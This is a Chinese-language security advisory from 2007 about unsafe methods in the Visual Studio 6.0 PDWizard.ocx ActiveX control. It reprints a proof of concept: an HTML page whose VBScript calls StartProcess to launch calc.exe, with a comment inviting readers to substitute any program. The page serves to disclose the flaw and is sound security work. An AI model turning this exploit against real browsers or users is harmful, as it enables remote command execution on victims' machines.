安全研究
安全漏洞
Microsoft Visual Studio PDWizard.ocx ActiveX控件多个不安全方式漏洞
发布日期:2007-09-11
更新日期:2007-09-12
受影响系统:
Microsoft Visual Studio 6.0描述:
BUGTRAQ ID: 25638
Microsoft Visual Studio是微软公司的开发工具套件系列产品,是一个基本完整的开发工具集,包括了软件整个生命周期中所需要的大部分工具。
Visual Studio所安装的PDWizard.ocx ActiveX控件没有正确地验证对StartProcess()、SyncShell()、SaveAs()、CABDefaultURL()、CABFileName()、CABRunFile()等方式的输入参数,如果用户受骗访问了恶意网页并向这些方式传送了超长参数的话,就可能导致执行任意指令,控制受影响的系统。
<*来源:shinnai (shinnai@autistici.org)
链接:http://secunia.com/advisories/26779/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<code><span style="font: 10pt Courier New;"><span class="general1-symbol"><body bgcolor="#E0E0E0">------------------------------------------------------------------------------------------------------
<b>Microsoft Visual Studio 6.0 PDWizard (PDWizard.ocx <= 6.0.0.9782) Remote Arbitrary Command Execution</b>
url: http://www.microsoft.com
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
<b><font color='red'>greetz to: Wiz001 (be safe brotha... and see soon :D)</font></b>
<b>Description:
This ocx contains a lot of extreme dangerous methods. Theese two are very interesting, they are:
"StartProcess()" and "SyncShell()"
Using one of them, you'll be able to run every program you like, simply giving to the method the
right argument.
In this PoC, I use the "StartProcess()" method to execute the calc.exe, but you can do everything
you like.
Anyway, I think you could imagine what impact could have this kind of vulnerability :D
Other dangerous methods of this ocx are:
"SaveAs()"
"CABDefaultURL()"
"CABFileName()"
"CABRunFile()"</b>
------------------------------------------------------------------------------------------------------
<object classid='clsid:0DDF3C0B-E692-11D1-AB06-00AA00BDD685' id='test'></object>
<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">
<script language = 'vbscript'>
Sub tryMe()
test.StartProcess "c:\windows\system32\calc.exe", "False" 'you can change with your favourite application ;)
End Sub
</script>
</span></span>
</code></pre>
建议:
厂商补丁:
Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.microsoft.com/technet/security/
浏览次数:2870
严重程度:0(网友投票)
绿盟科技给您安全的保障
